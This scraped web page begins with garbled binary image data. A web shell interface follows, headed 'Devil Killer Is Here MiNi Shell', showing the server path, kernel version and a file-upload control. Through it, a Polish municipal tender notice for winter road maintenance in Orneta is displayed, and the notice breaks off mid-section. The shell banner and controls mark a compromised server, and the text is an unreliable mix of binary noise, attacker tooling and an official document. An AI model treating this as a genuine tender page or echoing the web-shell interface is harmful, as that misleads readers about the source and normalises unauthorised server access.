JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20211011/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20211011/0022822101-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Zimowe utrzymanie dróg gminnych, wewnętrznych, placów i parkingów w granicach administracyjnych miasta oraz drogi Orneta – Krosno – Zadanie 1 </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Orneta</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 170748092</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Plac Wolności 26</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Orneta</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">11-130</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">warmińsko-mazurskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL622 - Olsztyński</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">552210200</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">552210210</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia@orneta.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://orneta-umig.bip-wm.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Zimowe utrzymanie dróg gminnych, wewnętrznych, placów i parkingów w granicach administracyjnych miasta oraz drogi Orneta – Krosno – Zadanie 1 </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-19be1015-2a71-11ec-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00228221</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-10-11</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00003141/04/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.7 Zimowe utrzymanie dróg gminnych i wewnętrznych na terenie Gminy Orneta Zadanie 1</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/orneta <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/orneta</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.Postępowanie prowadzone jest w języku polskim.<br/>2.Komunikacja w postępowaniu o udzielenie zamówienia, w tym składanie ofert, wymiana informacji<br/>oraz przekazywanie dokumentów lub oświadczeń między zamawiającym a wykonawcą, odbywa się<br/>przy użyciu środków komunikacji elektronicznej, za pośrednictwem platformazakupowa.pl pod adresem<br/>https://platformazakupowa.pl/pn/orneta.<br/>3. Sposób sporządzenia dokumentów elektronicznych, cyfrowych odwzorowań dokumentów oraz<br/>informacji musi być zgody z wymaganiami określonymi w rozporządzeniu Prezesa Rady Ministrów z<br/>dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań<br/>technicznych<br/>Dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o<br/>udzielenie zamówienia publicznego lub konkursie (Dz. U. z 2020 r., poz. 2452).<br/>4. Ze względu na ograniczoną liczbę znaków w formularzu ogłoszenia, informuję iż informacje o<br/>środkach komunikacji elektronicznej , przy użyciu których Zamawiający będzie komunikował się z<br/>Wykonawcami oraz informacje o wymaganiach technicznych i organizacyjnych sporządzania,<br/>wysyłania i odbierania korespondencji elektronicznej w tym dotyczące wymogu użycia podpisu<br/>elektronicznego, zostały szczegółowo określone w § 12, 13 i 17 IDW Rozdziału I SWZ dostępnej pod<br/>adresem https://platformazakupowa.pl/pn/orneta</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu<br/>Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w<br/>związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz<br/>uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o danych) (Dz. Urz. UE L 119 z dnia 4 maja<br/>2016 r., str. 1; zwanym dalej „RODO”) informujemy, że:<br/>1) administratorem Pani/Pana danych osobowych w rozumieniu art. 4 ust. 7 RODO przetwarzanych w<br/>Urzędzie Miejskim w Ornecie jest: Burmistrz Ornety z siedzibą pod adresem, Plac Wolności 26, 11-130<br/>Orneta (dalej Administrator);<br/>2) administrator wyznaczył Inspektora Ochrony Danych Osobowych, z którym można się kontaktować<br/>mailowo pod adresem email: iod@orneta.pl we wszystkich sprawach dotyczących przetwarzania<br/>danych osobowych oraz korzystania z praw związanych z przetwarzaniem danych osobowych;<br/>3) Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu<br/>związanym z przedmiotowym postępowaniem o udzielenie zamówienia publicznego, prowadzonym w<br/>trybie podstawowym bez negocjacji pn. „Zimowe utrzymanie dróg gminnych, wewnętrznych, placów i parkingów w granicach administracyjnych miasta Orneta – Krosno – Zadanie 1”<br/>4) odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie<br/>dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ustawy P.z.p.<br/>5) Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 P.z.p. przez okres 4 lat od<br/>dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4<br/>lata, okres przechowywania obejmuje cały czas trwania umowy;<br/>6) obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest<br/>wymogiem ustawowym określonym w przepisanych ustawy P.z.p., związanym z udziałem w<br/>postępowaniu o udzielenie zamówienia publicznego.<br/>7) w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób<br/>zautomatyzowany, stosownie do art. 22 RODO.<br/>8) posiada Pani/Pan:<br/>a) na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących (w<br/>przypadku, gdy skorzystanie z tego prawa wymagałoby po stronie administratora niewspółmiernie<br/>dużego wysiłku może zostać Pani/Pan zobowiązana do wskazania dodatkowych informacji mających<br/>na celu sprecyzowanie żądania, w szczególności podania nazwy lub daty postępowania o udzielenie<br/>zamówienia publicznego lub konkursu albo sprecyzowanie nazwy lub daty zakończonego<br/>postępowania o udzielenie zamówienia);<br/>b) na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych (skorzystanie z<br/>prawa do sprostowania nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia<br/>publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą PZP oraz nie może<br/>naruszać integralności protokołu oraz jego załączników);<br/>c) na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych<br/>osobowych z zastrzeżeniem okresu trwania postępowania o udzielenie zamówienia publicznego lub<br/>konkursu oraz przypadków, o których mowa w art. 18 ust. 2 RODO (prawo do ograniczenia<br/>przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia<br/>korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej,<br/>lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego);<br/>d) prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan,<br/>że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Nie przysługuje Pani/Panu:<br/>a) w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>b) prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>c) na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO;<br/>Przysługuje Pani/Panu prawo wniesienia skargi do organu nadzorczego na niezgodne z RODO<br/>przetwarzanie Pani/Pana danych osobowych przez administratora. Organem właściwym dla<br/>przedmiotowej skargi jest Urząd Ochrony Danych Osobowych, ul. Stawki 2, 00-193 Warszawa.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP 271.9.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Zakres rzeczowy przedmiotu zamówienia obejmuje:<br/><br/>1) Gotowość Wykonawcy do świadczenia usługi – planowany okres 5 miesięcy<br/>2) Odśnieżanie dróg gminnych i wewnętrznych wraz z zatokami i parkingami w ciągach <br/> tych dróg na terenie miasta Orneta oraz drogi Orneta – Krosno <br/>-	planowana ilość 1 działania – 19,755 km <br/>-	planowana liczba działań – 6 <br/>Wykaz dróg gminnych, dróg wewnętrznych zimowego utrzymania w zakresie odśnieżania zawiera załącznik nr 1 do Szczegółowego opisu przedmiotu zamówienia Rozdziału III SWZ<br/>3) Zwalczanie śliskości zimowej (posypania jezdni na całej szerokości mieszanką <br/> piaskowo - solną) dróg gminnych i wewnętrznych, placów i parkingów na terenie <br/> miasta Orneta oraz drogi Orneta – Krosno <br/>-	planowana ilość 1 działania – 19,110 km <br/>-	planowana liczba działań – 7 <br/>Wykaz dróg gminnych, dróg wewnętrznych, placów i parkingów zimowego utrzymania <br/>w zakresie zwalczania śliskości zawiera załącznik nr 2 do Szczegółowego opisu przedmiotu zamówienia Rozdziału III SWZ <br/>4) Jednoczesne odśnieżanie i zwalczanie śliskości zimowej (odśnieżanie wraz z posypaniem jezdni na całej szerokości mieszanką piaskowo- solną przy użyciu pługopiaskarek) dróg gminnych i wewnętrznych wraz z zatokami i parkingami w ciągach tych dróg na terenie miasta Orneta oraz drogi Orneta – Krosno <br/>-	planowana ilość 1 działania – 18,020 km <br/>-	planowana liczba działań – 7 <br/>Wykaz dróg gminnych, dróg wewnętrznych zimowego utrzymania w zakresie jednoczesnego odśnieżania i zwalczania śliskości zimowej zawiera załącznik nr 3 <br/>do Szczegółowego opisu przedmiotu zamówienia Rozdziału III SWZ <br/>5) Odśnieżanie placów i parkingów na terenie miasta Orneta. <br/>-	planowana ilość 1 działania - 5,0 godz. <br/>-	planowana liczba działań – 6 <br/> Wykaz placów i parkingów zimowego utrzymania w zakresie odśnieżania zawiera <br/> załącznik nr 4 do Szczegółowego opisu przedmiotu zamówienia Rozdziału III SWZ <br/> 6) Odśnieżania dróg gminnych i wewnętrznych przy występowaniu szczególnie trudnych warunków pogodowych <br/> - planowana ilość 1 działania - 12 godz. <br/>-	planowana liczba działań – 3 <br/> 7) Załadunek i wywóz śniegu z terenu miasta na odległość 1,5 km <br/> - planowana ilość 1 działania - 8,0 godz. <br/> - planowana liczba działań – 2 <br/>2. Szczegółowy opis, zakres oraz sposób realizacji zamówienia przedstawiony został w<br/>Szczegółowym opisie przedmiotu zamówienia Rozdziału III SWZ i Projekcie umowy Rozdziału<br/>IV SWZ </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90620000-9 - Usługi odśnieżania</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">90630000-2 - Usługi usuwania oblodzeń</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">6 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane: <span class="normal">1. Zakres zamówienia polegającego na powtórzeniu podobnych usług obejmuje :<br/>1)	Gotowość Wykonawcy do świadczenia usługi – 2 miesiące<br/>2)	Odśnieżanie dróg gminnych i wewnętrznych wraz z zatokami i parkingami w ciągach tych dróg na terenie miasta Orneta oraz drogi Orneta – Krosno<br/>-	planowana ilość 1 działania – 19,755 km<br/>-	planowana liczba działań – 4<br/>3)	Zwalczanie śliskości zimowej (posypania jezdni na całej szerokości mieszanką piaskowo - solną) dróg gminnych i wewnętrznych, placów i parkingów na terenie miasta Orneta oraz drogi Orneta – Krosno<br/>-	planowana ilość 1 działania – 19,110 km<br/>-	planowana liczba działań – 4<br/>4)	Jednoczesne odśnieżanie i zwalczanie śliskości zimowej (odśnieżanie wraz z posypaniem jezdni na całej szerokości mieszanką piaskowo - solną przy użyciu pługopiaskarek) dróg gminnych i wewnętrznych wraz z zatokami i parkingami <br/>w ciągach tych dróg na terenie<br/> miasta Orneta oraz drogi Orneta – Krosno<br/>-	planowana ilość 1 działania – 18,020 km<br/>-	planowana liczba działań – 3<br/>5)	Odśnieżanie placów i parkingów na terenie miasta Orneta.<br/>-	planowana ilość 1 działania- 5,0 godz.<br/>-	planowana liczba działań – 4<br/>6)	Odśnieżania dróg gminnych i wewnętrznych przy występowaniu szczególnie trudnych warunków pogodowych<br/>-	planowana ilość 1 działania- 12 godz.<br/>-	planowana liczba działań – 2<br/>7) Załadunek i wywóz śniegu z terenu miasta na odległość 1,5 km<br/>-	planowana ilość 1 działania- 8,0 godz.<br/>-	planowana liczba działań – 2<br/>2.	Warunki, na jakich zostaną udzielone usługi wymienione w ust. 1<br/>1)	zamówienie będzie mogło być udzielone w przypadku gdy Zamawiający będzie dysponował środkami finansowymi na jego realizację,<br/>2)	umowa zostanie zawarta po przeprowadzeniu negocjacji z Wykonawcą,<br/>3)	cena za wykonanie przedmiotu zamówienia zostanie ustalona podczas negocjacji na podstawie wypełnionego i złożonego przez Wykonawcę Formularza cenowego,<br/>4)	Zamawiający przekaże Wykonawcy Formularz cenowy do wypełnienia<br/>5)	ceny za poszczególne pozycje Formularza cenowego nie będą mogły być wyższe niż ceny zaproponowane w zamówieniu podstawowym, chyba że Wykonawca uzasadni ich wzrost,<br/>6)	wzór umowy zostanie przekazany Wykonawcy wraz z zaproszeniem do negocjacji,<br/>7)	kary umowne będą przewidziane w takich samych wypadkach i w wysokości nie wyższej jak w umowie zawartej w postępowaniu na zamówienie podstawowe,<br/>8)	obowiązki Wykonawcy i Zamawiającego będą uregulowane na zasadach analogicznych do umowy zawartej w postępowaniu na zamówienie podstawowe.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.Opis kryterium cena – „C”<br/>Kryterium cena „C” będzie rozpatrywane na podstawie ceny ofertowej brutto za wykonanie przedmiotu zamówienia podanej przez Wykonawcę w Formularzu „OFERTA”<br/>W tym kryterium można uzyskać maksymalnie 60 punktów. Przyznane punkty zostaną zaokrąglone do dwóch miejsc po przecinku.<br/>Faktyczna ilość punktów za kryterium „cena” zostanie obliczona według poniższego wzoru:<br/> „C” =	(cena brutto najniższa/cena brutto badanej oferty) x 60% x 100pkt<br/>2.Opis kryterium czas reakcji ” CR”<br/>Kryterium czas reakcji tj. czas rozpoczęcia akcji zimowej w zakresie odśnieżania i/lub zwalczania śliskości zimowej i/lub wywozu śniegu przez co najmniej wymagane przez Zamawiającego jednostki sprzętowe Wykonawcy przeznaczone do realizacji zimowego utrzymania w zakresie odśnieżania i/lub zwalczania śliskości zimowej i/lub wywozu nadmiaru śniegu (w zależności od zakresu zgłoszenia przez Zamawiającego) określone w § 3 ust. 2 projektu Umowy Rozdziału IV SWZ, liczony od zgłoszenia przez Przedstawiciela Zamawiającego telefonicznie lub w formie elektronicznej rozpoczęcia akcji zimowej w zakresie odśnieżania i/lub zwalczania śliskości zimowej i/lub wywozu śniegu będzie rozpatrywane na podstawie czasu reakcji udzielonego przez Wykonawcę dla przedmiotu zamówienia, podanego przez Wykonawcę w Formularzu „OFERTA” Przez rozpoczęcie akcji zimowej będzie rozumiane faktyczne rozpoczęcie odśnieżania i/lub zwalczania śliskości zimowej i/lub wywozu śniegu przez co najmniej wymagane przez Zamawiającego jednostki sprzętowe Wykonawcy przeznaczone do realizacji zimowego utrzymania w zakresie odśnieżania i/lub zwalczania śliskości zimowej i/lub wywozu nadmiaru śniegu (w zależności od zakresu zgłoszenia przez Zamawiającego) określone w § 3 ust. 2 projektu Umowy Rozdziału IV SWZ , a nie wyjazd tych jednostek w celu udania się na drogę, plac, parking wymagających odśnieżania, zwalczania śliskości zimowej, wywozu śniegu.<br/>Faktyczna ilość punktów za kryterium „czas reakcji” zostanie obliczona według poniższego wzoru:<br/> „CR” = (CRmax – CRo/ CRmax – Crmin) x 100,00 pkt x 30%	<br/> gdzie:<br/> CR – punktacja obliczona dla danej oferty wg kryterium „czas reakcji” <br/> CR max - najdłuższy możliwy czas reakcji (do 90 minut)<br/> CR o – czas reakcji zadeklarowany w ofercie ocenianej <br/> CR min - najkrótszy możliwy czas reakcji (do 30 minut)<br/>3.Opis kryterium termin płatności „TP”<br/>Kryterium termin płatności będzie rozpatrywane na podstawie terminu płatności udzielonego przez Wykonawcę dla przedmiotu zamówienia, podanego przez Wykonawcę w Formularzu „OFERTA”<br/>Zamawiający zastrzega, że wymagany przez Zamawiającego minimalny termin płatności wynosi do 14 dni od daty otrzymania przez Zamawiającego prawidłowo wystawionej faktury VAT wraz z dokumentami rozliczeniowymi, natomiast maksymalny termin płatności wynosido 30 dni od daty otrzymania przez Zamawiającego prawidłowo wystawionej faktury VAT wraz z dokumentami rozliczeniowymi.<br/>Zaoferowanie terminu płatności krótszego niż do 14 dni od daty otrzymania przez<br/>Zamawiającego prawidłowo wystawionej faktury VAT wraz z dokumentami rozliczeniowymi spowoduje odrzucenie oferty na podstawie art. 226 ust. 1 pkt 5 ustawy Pzp. <br/>W przypadku oferowanego terminu płatności dłuższego niż do 30 dni od daty otrzymania przez Zamawiającego prawidłowo wystawionej faktury VAT wraz z dokumentami rozliczeniowymi<br/>do obliczenia ilości punktów w kryterium oceny ofert „termin płatności” przyjęty zostanie termin płatności do 30 dni.<br/>W tym kryterium można uzyskać maksymalnie 10 punktów.<br/><br/>Faktyczna ilośc punktów za kryterium „termin płatności” zostanie obliczona według poniższego wzoru:<br/>„TP” = (TPo - TPmin)/(TPmax - TPmin) x 10% x 100,00 pkt<br/>gdzie:<br/>TP – punktacja obliczona dla danej oferty wg kryterium „termin płatności” <br/>TPo – termin płatności zadeklarowany w ofercie ocenianej<br/>TP min - najkrótszy możliwy termin płatności (do 14 dni) <br/> TP max - najdłuższy możliwy termin płatności (do 30 dni)</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">czas reakcji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin płatności</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - 